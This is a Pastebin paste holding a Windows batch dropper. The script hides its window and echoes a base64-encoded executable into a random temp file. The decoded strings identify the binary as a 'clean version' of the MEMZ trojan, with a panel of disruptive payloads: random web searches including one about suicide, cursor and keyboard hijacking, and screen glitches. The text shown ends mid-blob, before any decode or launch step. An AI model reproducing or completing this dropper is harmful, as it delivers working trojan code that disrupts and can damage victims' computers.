SHARE
TWEET

Untitled

a guest May 16th, 2018 106 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. @echo off
 2. powershell.exe -WindowStyle Hidden exit
 3. set f=%tmp%\%random%%random%%random%%random%
 4. echo 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>%f%
 5. echo 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LmNrL3NlYXJjaD9xPWhvdysyK3JlbW92ZSthK3ZpcnVzAAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1tY2FmZWUrdnMrbm9ydG9uAAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1ob3crdG8rc2VuZCthK3ZpcnVzK3RvK215K2ZyaWVuZAAAAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9bWluZWNyYWZ0K2hheCtkb3dubG9hZCtubyt2aXJ1cwAAAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWhvdyt0bytnZXQrbW9uZXkAAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWJvbnppK2J1ZGR5K2Rvd25sb2FkK2ZyZWUAAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9aG93KzIrYnV5K3dlZWQAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1ob3crdG8rY29kZSthK3ZpcnVzK2luK3Zpc3VhbCtiYXNpYwAAAAAAAAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT13aGF0K2hhcHBlbnMraWYreW91K2RlbGV0ZStzeXN0ZW0zMgAAAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWczdCtyM2t0AAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1iYXRjaCt2aXJ1cytkb3dubG9hZAAAAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9dmlydXMuZXhlAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWludGVybmV0K2V4cGxvcmVyK2lzK3RoZStiZXN0K2Jyb3dzZXIAAAAAAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWZhY2Vib29rK2hhY2tpbmcrdG9vbCtmcmVlK2Rvd25sb2FkK25vK3ZpcnVzK3dvcmtpbmcrMjAxNgAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT12aXJ1cytidWlsZGVyK2xlZ2l0K2ZyZWUrZG93bmxvYWQAAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9aG93K3RvK2NyZWF0ZSt5b3VyK293bityYW5zb213YXJlAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWhvdyt0bytyZW1vdmUrbWVteit0cm9qYW4rdmlydXMAAAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1teStjb21wdXRlcitpcytkb2luZyt3ZWlyZCt0aGluZ3Mrd3RmK2lzK2hhcHBlbmluK3BseitoYWxwAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9ZGFuayttZW16AABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWhvdyt0bytkb3dubG9hZCttZW16AAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1oYWxmK2xpZmUrMytyZWxlYXNlK2RhdGUAAABodHRwOi8vZ29vZ2xlLmNvLmNrL3NlYXJjaD9xPWlzK2lsbHVtaW5hdGkrcmVhbAAAAAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1tb250YWdlK3Bhcm9keSttYWtpbmcrcHJvZ3JhbSsyMDE2AGh0dHA6Ly9n>>%f%
 6. echo b29nbGUuY28uY2svc2VhcmNoP3E9dGhlK21lbXorYXJlK3JlYWwAAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9c3Rhbmt5K2Rhbmt5K21heW1heXMAAAAAAAAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1qb2huK2NlbmErbWlkaStsZWdpdCtub3QrY29udmVydGVkAGh0dHA6Ly9nb29nbGUuY28uY2svc2VhcmNoP3E9dmluZXNhdWNlK21lbWUrY29sbGVjdGlvbgAAaHR0cDovL2dvb2dsZS5jby5jay9zZWFyY2g/cT1za3JpbGxleCtzY2F5K29uc3RlcithbituaWNlK3Nwcml0ZXMrbWlkaQAAaHR0cDovL2Fuc3dlcnMubWljcm9zb2Z0LmNvbS9lbi11cy9wcm90ZWN0L2ZvcnVtL3Byb3RlY3Rfb3RoZXItcHJvdGVjdF9zY2FubmluZy9tZW16LW1hbHdhcmV2aXJ1cy10cm9qYW4tY29tcGxldGVseS1kZXN0cm95aW5nLzI2OGJjMWMyLTM5ZjQtNDJmOC05MGMyLTU5N2E2NzNiNmI0NQAAAAAAaHR0cDovL21vdGhlcmJvYXJkLnZpY2UuY29tL3JlYWQvd2F0Y2gtdGhpcy1tYWx3YXJlLXR1cm4tYS1jb21wdXRlci1pbnRvLWEtZGlnaXRhbC1oZWxsc2NhcGUAAAAAaHR0cDovL3BsYXkuY2x1YnBlbmd1aW4uY29tAGh0dHA6Ly9wY29wdGltaXplcnByby5jb20AAABodHRwOi8vc29mdG9uaWMuY29tAGNhbGMAAAAAbm90ZXBhZABjbWQAd3JpdGUAAAByZWdlZGl0AGV4cGxvcmVyAAAAAHRhc2ttZ3IAbXNjb25maWcAAAAAbXNwYWludABkZXZtZ210Lm1zYwBjb250cm9sAG1tYwBTeXN0ZW1IYW5kAABTeXN0ZW1RdWVzdGlvbgAAU3lzdGVtRXhjbGFtYXRpb24AAABNAEUATQBaAFAAYQBuAGUAbAAAAAAAAABNAEUATQBaACAAQwBsAGUAYQBuACAAVgBlAHIAcwBpAG8AbgAgAC0AIABQAGEAeQBsAG8AYQBkACAAUABhAG4AZQBsAAAAAABCAFUAVABUAE8ATgAAAAAATUVNWgAAAABUaGlzIHBheWxvYWQgaXMgY29uc2lkZXJlZCBzZW1pLWhhcm1mdWwuDQpUaGlzIG1lYW5zLCBpdCBzaG91bGQgYmUgc2FmZSB0byB1c2UsIGJ1dCBjYW4gc3RpbGwgY2F1c2UgZGF0YSBsb3NzIG9yIG90aGVyIHRoaW5ncyB5b3UgbWlnaHQgbm90IHdhbnQuDQoNCklmIHlvdSBoYXZlIHByb2R1Y3RpdmUgZGF0YSBvbiB5b3VyIHN5c3RlbSBvciBzaWduZWQgaW4gdG8gb25saW5lIGFjY291bnRzLCBpdCBpcyByZWNvbW1lbmRlZCB0byBydW4gdGhpcyBwYXlsb2FkIGluc2lkZSBhIHZpcnR1YWwgbWFjaGluZSBpbiBvcmRlciB0byBwcmV2ZW50IHBvdGVudGlhbCBkYXRhIGxvc3Mgb3IgY2hhbmdlZCB0aGluZ3MgeW91IG1pZ2h0IG5vdCB3YW50Lg0KDQpEbyB5b3Ugc3RpbGwgd2FudCB0byBlbmFibGUgaXQ/AAAAAEUATgBBAEIATABFAEQAAABEAEkAUwBBAEIATABFAEQAAAAAAFAAYQB5AGwAbwBhAGQAcwAgAGEAcgBlACAAYwB1AHIAcgBlAG4AdABsAHkAIAAlADEALgAgAFAAcgBlAHMAcwAgAFMASABJAEYAVAArAEUAUwBDACAAdABvACAAdABvAGcAZwBsAGUAIABhAGwAbAAgAHAAYQB5AGwAbwBhAGQAcwAhAAAAAABQAHIAZQBzAHMAIABDAFQAUgBMACsAUwBIAEkARgBUACsAUwAgAHQAbwAgAHMAawBpAHAAIABzAG8AbQBlACAAdABpAG0AZQAgACgAbQBhAGsAZQBzACAAcwBvAG0AZQAgAHAAYQB5AGwAbwBhAGQAcwAgAGYAYQBzAHQAZQByACkAAAAKAAAATwBwAGUAbgAgAHIAYQBuAGQAbwBtACAAdwBlAGIAcwBpAHQAZQBzAC8AcAByAG8AZwByAGEAbQBzAAAAUgBhAG4AZABvAG0AIABjAHUAcgBzAG8AcgAgAG0AbwB2AGUAbQBlAG4AdAAAAAAAUgBhAG4AZABvAG0AIABrAGUAeQBiAG8AYQByAGQAIABpAG4AcAB1AHQAAABSAGEAbgBkAG8AbQAgAGUAcgByAG8AcgAgAHMAbwB1AG4AZABzAAAARgBsAGEAcwBoAGkAbgBnACAAcwBjAHIAZQBlAG4AAABNAGUAcwBzAGEAZwBlACAAYgBvAHgAZQBzAAAARAByAGEAdwAgAGUAcgByAG8AcgAgAGkAYwBvAG4AcwAAAAAAUgBlAHYAZQByAHMAZQAgAHQAZQB4AHQAAAAAAFQAdQBuAG4AZQBsACAAZQBmAGYAZQBjAHQAAABTAGMAcgBlAGUAbgAgAGcAbABpAHQAYwBoAGUAcwAAAG9wZW4AAAAAbABvAGwAAABTAHQAaQBsAGwAIAB1AHMAaQBuAGcAIAB0AGgAaQBzACAAYwBvAG0AcAB1AHQAZQByAD8AAAAAAAAAAAAAAMA/AAAAAAAA8D8AAAAAAAAIQAAAAAAAABBAAAAAAAAAFEAAAAAAAAAkQAAAAAAAAC5AAAAAAAAANEAAAAAAAABZQAAAAAAAAGlAAAAAAABAf0AAAAAAAHCXQAAAAAAAQJ9AAAAAANlHglcAAAAADQAAAOwAAAA4LwAAOCEAAAAAAADZR4JXAAAAAA4AAAAAAAAAAAAAAAAAAABHQ1RMABAAABUMAAAudGV4dCRtbgAAAAAAIAAAAAEAAC5pZGF0YSQ1AAAAAAAhAAA4DgAALnJkYXRhAAA4LwAA7AAAAC5yZGF0YSR6enpkYmcAAAAkMAAAjAAAAC5pZGF0YSQyAAAAALAwAAAUAAAALmlkYXRhJDMAAAAAxDAAAAABAAAuaWRhdGEkNAAAAADEMQAA8AMAAC5pZGF0YSQ2AAAAAABAAAAMAgAALmRhdGEAAAAMQgAAHAAAAC5ic3MAAAAAAFAAAGAAAAAucnNyYyQwMQAAAABgUAAAgAIAAC5yc3JjJDAyAAAAAPgwAAAAAAAAAAAAAGQyAAA0IAAALDEAAAAAAAAAAAAAwjQAAGggAADYMAAAAAAAAAAAAAAwNQAAFCAAAMQwAAAAAAAAAAAAAGQ1AAAAIAAAJDEAAAAAAAAAAAAAgjUAAGAgAAC8MQAAAAAAAAAAAACcNQAA+CAAANAwAAAAAAAAAAAAAKY1AAAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6NQAAUjUAAAAAAAARAACAAAAAAM40AADuNAAA/jQAAAw1AAAYNQAAIjUAANw0AAAAAAAA+DEAANoxAAAAMgAATjIAAEAyAAAyMgAAHjIAAOgxAAASMgAAxDEAAAAAAAByNQAAAAAAAGozAAB+MwAAjDMAAJ4zAACyMwAAwDMAAD4zAADwMwAABjQAABI0AAAeNAAALDQAADg0AABGNAAAVjQAAFozAAB6NAAAjjQAAKQ0AAC2NAAAMDMAACAzAAAMMwAA/jIAAPAyAADeMgAAyjIAALgyAACoMgAAlDIAAIAyAABmNAAASjMAAHIyAADcMwAAAAAAAI41AAAAAAAAwQFHZXRDdXJyZW50UHJvY2Vzc0lkABkBRXhpdFByb2Nlc3MAtQBDcmVhdGVUaHJlYWQAALIEU2xlZXAAXgFGb3JtYXRNZXNzYWdlVwAATgVsc3RybGVuVwAAGAJHZXRNb2R1bGVIYW5kbGVXAACzAkdsb2JhbEFsbG9jALoCR2xvYmFsRnJlZQAAxQFHZXRDdXJyZW50VGhyZWFkSWQAAEtFUk5FTDMyLmRsbAAAXQFHZXRNZXNzYWdlVwD8AlRyYW5zbGF0ZU1lc3NhZ2UAAK8ARGlzcGF0Y2hNZXNzYWdlVwAAfAJTZW5kTWVzc2FnZVcAAJwARGVmV2luZG93UHJvY1cAAE0CUmVnaXN0ZXJDbGFz>>%f%
 7. echo c0V4VwAAbgBDcmVhdGVXaW5kb3dFeFcA3wJTaG93V2luZG93AAA9AUdldEtleVN0YXRlAH4BR2V0U3lzdGVtTWV0cmljcwAAEQNVcGRhdGVXaW5kb3cAAA4AQmVnaW5QYWludAAA3ABFbmRQYWludAAASgJSZWRyYXdXaW5kb3cAAJwBR2V0V2luZG93UmVjdAACAEFkanVzdFdpbmRvd1JlY3QAAA4CTWVzc2FnZUJveEEAlgFHZXRXaW5kb3dMb25nVwAAIwFHZXREZXNrdG9wV2luZG93AADyAEVudW1XaW5kb3dzAKQBR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkAADNAUlzRGlhbG9nTWVzc2FnZVcAAHsCU2VuZE1lc3NhZ2VUaW1lb3V0VwB2AlNlbmRJbnB1dADHAERyYXdJY29uAACSAUdldFdpbmRvd0RDAGUCUmVsZWFzZURDABUCTWVzc2FnZUJveFcAigJTZXRDdXJzb3JQb3MAACABR2V0Q3Vyc29yUG9zAADfAEVudW1DaGlsZFdpbmRvd3MAAM8CU2V0V2luZG93c0hvb2tFeFcAAANVbmhvb2tXaW5kb3dzSG9va0V4ABwAQ2FsbE5leHRIb29rRXgAAO0BTG9hZEljb25XAFVTRVIzMi5kbGwAAEEAQ3JlYXRlRm9udFcADQJHZXRTdG9ja09iamVjdAAAdwJTZWxlY3RPYmplY3QAAP0BR2V0T2JqZWN0VwAAuQJUZXh0T3V0VwAAEwBCaXRCbHQAALMCU3RyZXRjaEJsdAAAR0RJMzIuZGxsALEAQ3J5cHRBY3F1aXJlQ29udGV4dFcAAMEAQ3J5cHRHZW5SYW5kb20AAEFEVkFQSTMyLmRsbAAAHgFTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAAgAUGxheVNvdW5kQQAAV0lOTU0uZGxsAENPTUNUTDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAghQABAIUAAdCFAAKQhQADkIUAAJCJAAFQiQACMIkAAuCJAAAAjQABEI0AAbCNAAKAjQADII0AAECRAAGgkQACoJEAA6CRAACglQACAJUAAqCVAANwlQAAUJkAASCZAAIgmQAC4JkAA8CZAADAnQABoJ0AAsCdAAFgoQAC4KEAA1ChAAPAoQAAEKUAADClAABQpQAAYKUAAIClAACgpQAA0KUAAPClAAEgpQABQKUAAXClAAGQpQABoKUAAdClAAIQpQAAAAAAAdhVAANgsQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADtFUAAFC1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAFUYQABELUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPBdAAHAtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAABaFkAAmC1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAALYWQAC4LUAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAIhlAANQtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAaF0AA+C1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ8YQAAULkAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAcxdAADAuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAGAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAAAfgIAAAAAAAAAAAAAAAAAAAAAAAA8P3htbCB2ZXJzaW9uPScxLjAnIGVuY29kaW5nPSdVVEYtOCcgc3RhbmRhbG9uZT0neWVzJz8+DQo8YXNzZW1ibHkgeG1sbnM9J3VybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxJyBtYW5pZmVzdFZlcnNpb249JzEuMCc+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSdhc0ludm9rZXInIHVpQWNjZXNzPSdmYWxzZScgLz4NCiAgICAgIDwv